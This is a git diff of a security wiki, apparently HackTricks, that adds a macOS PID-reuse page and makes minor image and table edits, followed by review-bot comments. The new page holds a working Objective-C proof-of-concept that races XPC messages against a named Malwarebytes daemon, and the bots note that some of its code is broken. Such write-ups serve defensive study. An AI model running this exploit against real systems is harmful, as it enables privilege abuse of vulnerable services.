diff --git a/.gitbook/assets/image (4) (1) (4).png b/.gitbook/assets/image (4) (1) (4).png new file mode 100644 index 00000000..955989ee Binary files /dev/null and b/.gitbook/assets/image (4) (1) (4).png differ diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png index 955989ee..0d4cd8ba 100644 Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 0d4cd8ba..743e51c3 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 7848b05e..84125f1c 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -144,6 +144,7 @@ * [macOS Bundles](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-bundles.md) * [macOS IPC - Inter Process Communication](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md) * [macOS XPC Connecting Process Check](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md) + * [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md) * [macOS XPC Authorization](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md) * [macOS Function Hooking](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md) * [Universal binaries & Mach-O Format](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md) 
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md new file mode 100644 index 00000000..4ad90577 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-pid-reuse.md @@ -0,0 +1,166 @@ +# macOS PID Reuse + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## PID Reuse + +When a macOS **XPC service** is checking the called process based on the **PID** and not on the **audit token**, it's vulnerable to PID reuse attack. This attack is based on a **race condition** where an **exploit** is going to **send messages to the XPC** service **abusing** the functionality and just **after** that, executing **`posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ)`** with the **allowed** binary. + +This function will make the **allowed binary own the PID** but the **malicious XPC message would have been sent** just before. So, if the **XPC** service **use** the **PID** to **authenticate** the sender and checks it **AFTER** the execution of **`posix_spawn`**, it will think it comes from an **authorized** process. + + + +### Exploit example + +If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\ +Like for example in this image (taken from the reference): + +
+ +Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit: + +* One that **generates several forks** +* **Each fork** will **send** the **payload** to the XPC service while executing **`posix_spawn`** just after sending the message. + +{% hint style="danger" %} +For the exploit to work it's important to export export OBJC\_DISABLE\_INITIALIZE\_FORK\_SAFETY=YES or to put in th exploit: + +```objectivec +asm(".section __DATA,__objc_fork_ok\n" +"empty:\n" +".no_dead_strip empty\n"); +``` +{% endhint %} + +```objectivec +// from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/ + +#import +#include +#include + +#define RACE_COUNT 32 +#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon" +#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon" + +// allow fork() between exec() +asm(".section __DATA,__objc_fork_ok\n" +"empty:\n" +".no_dead_strip empty\n"); + +extern char **environ; + +// defining necessary protocols +@protocol ProtectionService +- (void)startDatabaseUpdate; +- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1; +- (void)uninstallProduct; +- (void)installProductUpdate; +- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2; +- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1; +- (void)triggerLicenseRelatedChecks; +- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2; +- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2; +- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3; +- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long 
long)arg2; +- (void)restartOS; +- (void)resumeScanJob; +- (void)pauseScanJob; +- (void)stopScanJob; +- (void)startScanJob; +- (void)disposeOperationBy:(NSUUID *)arg1; +- (void)subscribeTo:(long long)arg1; +- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2; +@end + +void child() { + + // send the XPC messages + NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)]; + NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged]; + xpcConnection.remoteObjectInterface = remoteInterface; + + [xpcConnection resume]; + [xpcConnection.remoteObjectProxy restartOS]; + + char target_binary[] = BINARY; + char *target_argv[] = {target_binary, NULL}; + posix_spawnattr_t attr; + posix_spawnattr_init(&attr); + short flags; + posix_spawnattr_getflags(&attr, &flags); + flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED); + posix_spawnattr_setflags(&attr, flags); + posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ); +} + +bool create_nstasks() { + + NSString *exec = [[NSBundle mainBundle] executablePath]; + NSTask *processes[RACE_COUNT]; + + for (int i = 0; i < RACE_COUNT; i++) { + processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]]; + } + + int i = 0; + struct timespec ts = { + .tv_sec = 0, + .tv_nsec = 500 * 1000000, + }; + + nanosleep(&ts, NULL); + if (++i > 4) { + for (int i = 0; i < RACE_COUNT; i++) { + [processes[i] terminate]; + } + return false; + } + + return true; +} + +int main(int argc, const char * argv[]) { + + if(argc > 1) { + // called from the NSTasks + child(); + + } else { + NSLog(@"Starting the race"); + create_nstasks(); + } + + return 0; +}obj +``` + +## Refereces + +* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/) + + + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md index 8c996adf..69f00424 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-authorization.md @@ -194,15 +194,7 @@ This means that at the end of this process, the permissions declared inside `com There are different scopes to indicate who can access a right. Some of them are defined in [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity\_authorization/lib/AuthorizationDB.h) (you can find [all of them in here](https://www.dssw.co.uk/reference/authorization-rights/)), but as summary: -| Name | Value | Description | -| ------------------------------------------- | -------------------------- | ---------------------------------------------------------------------- | -| kAuthorizationRuleClassAllow | allow | Anyone | -| kAuthorizationRuleClassDeny | deny | Nobody | -| kAuthorizationRuleIsAdmin | is-admin | Current user needs to be an admin (inside admin group) | -| kAuthorizationRuleAuthenticateAsSessionUser | authenticate-session-owner | Ask user to authenticate. | -| kAuthorizationRuleAuthenticateAsAdmin | authenticate-admin | Ask user to authenticate. He needs to be an admin (inside admin group) | -| kAuthorizationRightRule | rule | Specify rules | -| kAuthorizationComment | comment | Specify some extra comments on the right | +
NameValueDescription
kAuthorizationRuleClassAllowallowAnyone
kAuthorizationRuleClassDenydenyNobody
kAuthorizationRuleIsAdminis-adminCurrent user needs to be an admin (inside admin group)
kAuthorizationRuleAuthenticateAsSessionUserauthenticate-session-ownerAsk user to authenticate.
kAuthorizationRuleAuthenticateAsAdminauthenticate-adminAsk user to authenticate. He needs to be an admin (inside admin group)
kAuthorizationRightRuleruleSpecify rules
kAuthorizationCommentcommentSpecify some extra comments on the right
### Rights Verification diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md index b2637dde..3120ebfc 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/macos-xpc-connecting-process-check.md @@ -27,6 +27,12 @@ When a connection is stablished to an XPC service, the server will check if the 6. The **verification** must be **based** on the connecting **client’s audit token** **instead** of its process ID (**PID**) since the former prevents PID reuse attacks. * Developers rarely use the audit token API call since it’s **private**, so Apple could **change** at any time. Additionally, private API usage is not allowed in Mac App Store apps. +For more information about the PID reuse attack check: + +{% content-ref url="macos-pid-reuse.md" %} +[macos-pid-reuse.md](macos-pid-reuse.md) +{% endcontent-ref %} + ### Code Examples The server will implement this **verification** in a function called **`shouldAcceptNewConnection`**. diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md index d43ecb4d..aef27af8 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/universal-binaries-and-mach-o-format.md 
@@ -127,7 +127,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY Or using [Mach-O View](https://sourceforge.net/projects/machoview/): -
+
## **Mach-O Load commands** diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md index 2f6a34b7..4d219b62 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-invader.md +++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md @@ -27,7 +27,7 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo In the Burp's builtin browser go to the **Burp extension** and enable it: -
+
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
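Review bot: in the new macos-pid-reuse.md, the exploit listing does not compile as pasted: the closing brace of `main` is immediately followed by a stray `obj` (`}obj`) before the fence, and the `#import` / `#include` lines at the top of the block carry no header names (Foundation for `NSXPCConnection`/`NSTask`, `spawn.h` for `posix_spawn`). In `create_nstasks`, `i` is set to 0 and then tested a single time with `if (++i > 4)`, so the branch that terminates the NSTasks is unreachable and its inner loop shadows the outer `i`; this looks like a retry loop that was lost when copying from the reference, so either restore the loop or drop the dead branch. Smaller points: "export export OBJC\_DISABLE\_INITIALIZE\_FORK\_SAFETY=YES" repeats the word, "in th exploit" should be "in the exploit", "if the XPC service use the PID" should be "uses", "It highly probable means" reads better as "This most likely means", and the heading "## Refereces" should be "## References". "Like for example in this image (taken from the reference):" is followed by no figure in this diff, so check that the image reference survived the asset rename in this same commit. Since the page only shows the attack, a one-line pointer to the mitigation already stated in macos-xpc-connecting-process-check.md (verify the audit token, not the PID) would put the fix next to the bug.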
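Review bot: in macos-xpc-authorization.md, the markdown table is replaced by an HTML table with the same seven rows, and the `+` lines as rendered here have already lost their cell boundaries, which is what this content will look like in every plain-text diff and grep from now on; unless GitBook's editor requires the HTML form, keep the markdown table so future changes to the rights scopes stay reviewable. If the rows are being touched anyway, "Ask user to authenticate. He needs to be an admin (inside admin group)" could become "Ask the user to authenticate; the user must be an admin (in the admin group)", and the authenticate-session-owner row, which only says "Ask user to authenticate.", should say that the user must authenticate as the session owner, otherwise it is indistinguishable from the admin row.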
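Review bot: the universal-binaries-and-mach-o-format.md hunk only swaps the figure under "Or using Mach-O View:", and the figure markup is not visible in this extract, so the change cannot be checked here. It is tied to the binary churn at the top of the commit: `image (4).png` receives new content (0d4cd8ba..743e51c3), its previous blob 0d4cd8ba becomes `image (4) (1).png`, and that file's previous blob 955989ee becomes `image (4) (1) (4).png`. Please confirm that each of the three pages touched (this one, dom-invader.md and the new macos-pid-reuse.md) points at the asset that actually shows the intended screenshot after that shift, since GitBook's re-upload renaming is easy to get crossed.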
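Review bot: in dom-invader.md the hunk only replaces the screenshot, but the context line immediately after it reads "Noe refresh the page"; since the file is already being edited, folding in "Now refresh the page" is worth doing.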